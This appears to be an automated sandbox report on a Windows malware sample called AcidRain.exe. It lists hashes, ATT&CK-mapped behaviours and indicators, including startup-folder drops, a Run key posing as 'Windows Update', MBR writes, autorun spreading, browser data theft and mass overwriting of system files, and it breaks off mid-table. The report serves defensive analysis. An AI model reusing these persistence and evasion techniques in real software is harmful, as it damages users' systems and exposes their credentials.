a9027c6070365053c3cb91261991c71f1d3a63707df8467e413847f344b3af4d

Analysis

max time kernel
307s
max time network
337s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
18-09-2022 14:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TrashMalwares-main/AcidRain.exe
Size

401KB
MD5

ca7d220a719d83aa0dd379dd2c31037a
SHA1

88518880ee68f2b108a99449da73ec92b5e3658a
SHA256

fa9189d2c7408a9f3bcb0af1be7f00ba71af5014a8bca0986eb11a891fa6c8b5
SHA512

eee05cd53f4f5edf6c6929a294284473c39b8193b211a3165333ed65c38ea4e9d5cc6a8e1a1ae2bb38652e83bc7d2ad20fa6d38f8cdbf3a94a7a10fb6358af78
SSDEEP

12288:aToPWBv/cpGrU3yy/paSymdM3Gi3AryjBi:aTbBv5rUVRdM2iwejBi

Score

8^/10

bootkit evasion persistence spyware stealer

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 6 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\drivers\afunix.sys	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gm.dls	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	cmd.exe

Executes dropped EXE 4 IoCs

Processes:

NyanCatIsHere.exeAcid Rain.exemsedge.exemsedge.exe

pid process

4864 NyanCatIsHere.exe
2004 Acid Rain.exe
5124 msedge.exe
4992 msedge.exe

pid	process
4864	NyanCatIsHere.exe
2004	Acid Rain.exe
5124	msedge.exe
4992	msedge.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcidRain.exeAcid Rain.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	AcidRain.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Acid Rain.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 11 IoCs

Processes:

cmd.exetaskmgr.exeAcidRain.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs	cmd.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\n0rt0nant1ldks.vbs	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe	AcidRain.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe	AcidRain.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs	cmd.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\sodnciwkms.vbs	taskmgr.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_240599625	AcidRain.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe	AcidRain.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe	AcidRain.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\hifjdnfejfnejnkdpamzm.vbs	taskmgr.exe

Loads dropped DLL 4 IoCs

Processes:

msedge.exemsedge.exe

pid process

5124 msedge.exe
5124 msedge.exe
4992 msedge.exe
4992 msedge.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
5124	msedge.exe
5124	msedge.exe
4992	msedge.exe
4992	msedge.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

NyanCatIsHere.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run	NyanCatIsHere.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\NyanCatIsHere.exe"	NyanCatIsHere.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

NyanCatIsHere.exe

description ioc process

File opened for modification \??\PhysicalDrive0 NyanCatIsHere.exe
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\BITLOC~1\autorun.inf cmd.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	NyanCatIsHere.exe

description	ioc	process
File opened for modification	C:\Windows\BITLOC~1\autorun.inf	cmd.exe

Drops file in System32 directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\MONITO~1.INF\monitor.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\NT2B13~1.INF\I386\PCLXL.GPD	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Dism\it-IT\AppxProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\iaLPSS2i_GPIO2_GLK.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\mwlu97w8x64.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netmlx5.inf_amd64_101a408e6cb1d8f8\netmlx5.inf	cmd.exe
File opened for modification	C:\Windows\SysWOW64\combase.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\DevicePairingFolder.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\msdv.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\c_usbfn.inf_amd64_64da5751ebd2f2f4\c_usbfn.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\netbxnda.inf_loc	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Dism\it-IT\OfflineSetupProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\HalExtIntcLpioDma.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\circlass.inf_amd64_9f3f831d13d3df1f\circlass.inf	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dpapimig.exe	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\netvwifibus.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\eeprom_qca9377_1p1_NFA435_olpc_DE_089C.bin	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\c_fsinfrastructure.inf_amd64_1ef682cfd6fc7d1c\c_fsinfrastructure.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\ialpss2i_gpio2_glk.inf_amd64_dad1e0a2b185e32b\iaLPSS2i_GPIO2_GLK.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_amd64_144351277838b429\nvraid.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\mausbhost.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\CompositeBus.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\NETAX88179_178a.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\UcmUcsiAcpiClient.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\kdnic.inf_amd64_6649425cdcae9b5f\kdnic.sys	cmd.exe
File opened for modification	C:\Windows\SysWOW64\Dism\ja-JP\FolderProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\ipmidrv.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\AcpiDev.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\ndisuio.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\iaLPSS2i_GPIO2_CNL.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\eeprom_ar6320_3p0_NFA344a_highTX_LE_3.bin	cmd.exe
File opened for modification	C:\Windows\SysWOW64\cryptdll.dll	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\mshdc.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\percsas3i.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\volume.inf_loc	cmd.exe
File opened for modification	C:\Windows\SysWOW64\d3d10core.dll	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\hiddigi.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\netmlx5.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mdmelsa.inf_amd64_f187fca538857daa\mdmelsa.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netvwwanmp.inf_amd64_f9e30429669d7fff\netvwwanmp.inf	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\termmou.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\usbvideo.inf_loc	cmd.exe
File opened for modification	C:\Windows\SysWOW64\at.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\azman.msc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\netl260a.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mdmtdkj7.inf_amd64_161e1375bcff85d9\mdmtdkj7.inf	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\imapi2.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\displayoverride.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\netip6.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mchgr.inf_amd64_399f04975a0af112\ddsmc.sys	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\NTPRIN~3.INF\Amd64\PSCRIPT.HLP	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\wextract.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\netl1e64.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\c_scmvolume.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\NT2B13~1.INF\I386\PS_SCHM.GDL	cmd.exe
File opened for modification	C:\Windows\SysWOW64\AdvancedInstallers\cmiv2.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\downlevel\api-ms-win-core-profile-l1-1-0.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dpnlobby.dll	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\de-DE\hpsamd.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\c_dot4print.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\en-US\ks.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\es-ES\rhproxy.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\eeprom_qca9377_1p1_NFA425_olpc_A_BC_CBXA0.bin	cmd.exe

Drops file in Program Files directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MIF8C5~1.SCA\Assets\Images\SKYPEL~4.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI46F3~1.0_X\Assets\CONTRA~2\PEB467~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI33D2~1.0_X\RESOUR~1\strings\LOB38B~1.JSO	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI83BA~1.0_X\Assets\INSIDE~3.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MI63E7~1.SCA\Assets\AppTiles\CONTRA~1\STOREL~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICROS~3.0_X\Assets\AppTiles\CONTRA~1\WEATHE~3.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI8AAC~1.0_X\MICROS~3.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI92C9~1.0_X\IRISPR~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\MSOARI~1.DLL	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\AppList.targetsize-64.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\CONTRA~2\AppList.targetsize-30_altform-unplated_contrast-white.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI83BA~1.0_X\Assets\INB472~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MI7D2A~1.SCA\Assets\TIMERW~2.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MIE788~1.SCA\Assets\SECOND~1\DIRECT~1\Work\LTR\CONTRA~1\SMALLT~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICROS~3.0_X\Assets\AppTiles\WEATHE~2\423x173\3.jpg	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID5E5~1.0_X\Assets\AppList.targetsize-60.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID540~1.SCA\Assets\CONTRA~1\MIXEDR~3.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIE908~1.SCA\Assets\SECOND~1\Work\CONTRA~2\SMALLT~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI4DB5~1.0_X\Assets\SECOND~1\TRAFFI~1\CONTRA~1\MEDTIL~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MICROS~4.SCA\RESOUR~1.PRI	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\HxCalendarWideTile.scale-400.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIBE99~1.0_X\Assets\GA33C9~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A7F~1.0_X\Assets\APF26E~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\OneNoteNotebookLargeTile.scale-200.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI7414~1.SCA\Assets\CA23E5~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.5\de\System.Data.DataSetExtensions.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~2\WindowsPowerShell\Modules\Pester\3.4.0\Functions\Assertions\ContainExactly.Tests.ps1	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIAFF4~1.0_X\RESOUR~1.PRI	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\AppList.targetsize-96_altform-unplated.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID54F~1.0_X\Assets\PhotosAppList.targetsize-20.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIB44A~1.0_X\Assets\CalculatorAppList.targetsize-40_altform-unplated.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\TELEME~1\hxcalendarappimm.exe_Rules.xml	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI32BC~1.0_X\Assets\APC3EB~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICROS~4.0_X\Assets\CONTRA~1\APBE3C~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\OneNoteNewNoteMedTile.scale-100.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI10D6~1.0_X\Assets\CONTRA~2\BadgeLogo.scale-200_contrast-white.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\HX42FD~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~2\HxA-Yahoo-Dark.scale-100.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICB88~1.0_X\Assets\AppTiles\AppIcon.targetsize-40.png	cmd.exe
File opened for modification	C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.5\fr\Microsoft.Build.Engine.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\fr-FR\WMPMediaSharing.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\STATER~1.SRD	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\de-DE\mshwLatin.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MID374~1.SCA\Assets\GA0241~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MID54F~1.0_X\MICROS~1.MEC\Assets\OFFLIN~1\Scripts\Me\MECONT~1\offline\WEBVIE~1.JS	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIB44A~1.0_X\Assets\CA3C41~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\CONTRA~1\EM67DB~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIBE99~1.0_X\Assets\GamesXboxHubWideTile.scale-100.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MICROS~4.SCA\Assets\WINDOW~1\WIB6F3~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6F49~1.0_X\Assets\Images\Stickers\THUMBN~1\STC83F~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIB28C~1.0_X\Assets\CONTRA~1\AppList.targetsize-48_altform-unplated_contrast-black.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI11B4~1.0_X\images\OFFICE~2.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MIE908~1.SCA\Assets\SECOND~1\Home\CONTRA~1\WIDETI~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WI54FB~1\es-ES\wmpnetwk.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MICROS~4.0_X\Assets\CONTRA~2\AP63CA~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\CONTRA~2\ONF0B7~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI4DB5~1.0_X\Assets\Images\PRINTA~1\GL5018~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI377C~1.0_N\APPXSI~1.P7X	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\Packages\C5E252~1.102\ACTIVA~2.LOG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\DELETE~1\MI2D19~1.SCA\Assets\AppPackageStoreLogo.scale-100.png	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI05FA~1.0_X\Assets\VIEWPO~1\Dark\Cavalier.png	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\Windows\AppRepository\Packages\MIE997~1.0_X\ACTIVA~2.LOG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI0A11~1.0_X\images\CONTRA~2\ONA315~1.PNG	cmd.exe
File opened for modification	C:\PROGRA~1\WindowsApps\MI6132~1.0_X\Assets\WideTile.scale-200.png	cmd.exe

Drops file in Windows directory 64 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-Printing-PremiumTools-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat	cmd.exe
File opened for modification	C:\Windows\ImmersiveControlPanel\images\wide.Holographic.png	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\HY6B83~1.CAT	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MI900C~2.CAT	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\fr\System.Drawing.Design.resources.dll	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Net.WebHeaderCollection.dll	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Runtime.Serialization.Formatters.dll	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MI1629~1.CAT	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Package_9_for_KB4557968~31bf3856ad364e35~amd64~~19041.262.1.1.cat	cmd.exe
File opened for modification	C:\Windows\diagnostics\system\IESecurity\it-IT\RS_PhishingFilter.psd1	cmd.exe
File opened for modification	C:\Windows\diagnostics\system\WINDOW~3\DiagPackage.diagpkg	cmd.exe
File opened for modification	C:\Windows\Fonts\cga40woa.fon	cmd.exe
File opened for modification	C:\Windows\PLA\Rules\de-DE\Rules.System.Configuration.xml	cmd.exe
File opened for modification	C:\Windows\servicing\INBOXF~1\metadata\LA0CA3~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MIF832~1.CAT	cmd.exe
File opened for modification	C:\Windows\INF\c_fscfsmetadataserver.inf	cmd.exe
File opened for modification	C:\Windows\servicing\INBOXF~1\metadata\LA023E~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\HY78D8~1.CAT	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MIFB8C~1.CAT	cmd.exe
File opened for modification	C:\Windows\Boot\PCAT\ko-KR\memtest.exe.mui	cmd.exe
File opened for modification	C:\Windows\diagnostics\system\Apps\de-DE\CL_LocalizationData.psd1	cmd.exe
File opened for modification	C:\Windows\Globalization\Time Zone\timezoneMapping.xml	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\HY6B13~1.CAT	cmd.exe
File opened for modification	C:\Windows\ShellExperiences\WindowsInternal.People.Relevance.QueryClient.dll	cmd.exe
File opened for modification	C:\Windows\Cursors\aero_working_l.ani	cmd.exe
File opened for modification	C:\Windows\ImmersiveControlPanel\pris\resources.en-US.pri	cmd.exe
File opened for modification	C:\Windows\PolicyDefinitions\OSPolicy.admx	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-UtilityVM-Containers-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.867.cat	cmd.exe
File opened for modification	C:\Windows\INF\mdmnttme.inf	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\de\System.Web.Routing.resources.dll	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.DynamicData.Design.dll	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MU691E~1.CAT	cmd.exe
File opened for modification	C:\Windows\Fonts\ssee1256.fon	cmd.exe
File opened for modification	C:\Windows\INF\prnms012.inf	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-Management-SecureAssessment-Package~31bf3856ad364e35~amd64~~10.0.19041.1023.cat	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\es-ES\ServiceModelInstallRC.dll.mui	cmd.exe
File opened for modification	C:\Windows\rescache\_merged\393768~1\307610~1.PRI	cmd.exe
File opened for modification	C:\Windows\servicing\INBOXF~1\metadata\LA633A~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MI0C2B~1.CAT	cmd.exe
File opened for modification	C:\Windows\INF\hidir.inf	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\V20~1.507\it\System.Web.Resources.dll	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\1040\vbc7ui.dll	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\HYA0BA~1.CAT	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-Client-Desktop-Required-Package01~31bf3856ad364e35~amd64~en-US~10.0.19041.1266.cat	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-EnterpriseClientSync-Host-Opt-Package~31bf3856ad364e35~amd64~~10.0.19041.207.cat	cmd.exe
File opened for modification	C:\Windows\diagnostics\system\Audio\RS_AudioServiceResponse.ps1	cmd.exe
File opened for modification	C:\Windows\INF\BITS\0000\bitsctrs.ini	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ja\Microsoft.CSharp.resources.dll	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.rsp	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\Microsoft-Windows-COM-MSMQ-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat	cmd.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\Microsoft.Build.Conversion.v4.0.resources.dll	cmd.exe
File opened for modification	C:\Windows\servicing\it-IT\CbsMsg.dll.mui	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\HyperV-KMCL-Host-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat	cmd.exe
File opened for modification	C:\Windows\Boot\EFI\pl-PL\memtest.efi.mui	cmd.exe
File opened for modification	C:\Windows\INF\c_avc.inf	cmd.exe
File opened for modification	C:\Windows\Installer\$PATCH~1\Managed\1926E8~1\100~1.402\F_BB64~1	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MIA191~1.CAT	cmd.exe
File opened for modification	C:\Windows\INF\msdv.inf	cmd.exe
File opened for modification	C:\Windows\Installer\$PATCH~1\Managed\68AB67~1\157~1.200\ADOBEP~1.PMP	cmd.exe
File opened for modification	C:\Windows\PrintDialog\appxblockmap.xml	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\HyperV-RDP4VS-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.84.cat	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MI9F30~1.CAT	cmd.exe
File opened for modification	C:\Windows\servicing\Packages\MIAAE3~1.CAT	cmd.exe
File opened for modification	C:\Windows\diagnostics\system\IESecurity\fr-FR\RS_PhishingFilter.psd1	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4480 schtasks.exe

pid	process
4480	schtasks.exe

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
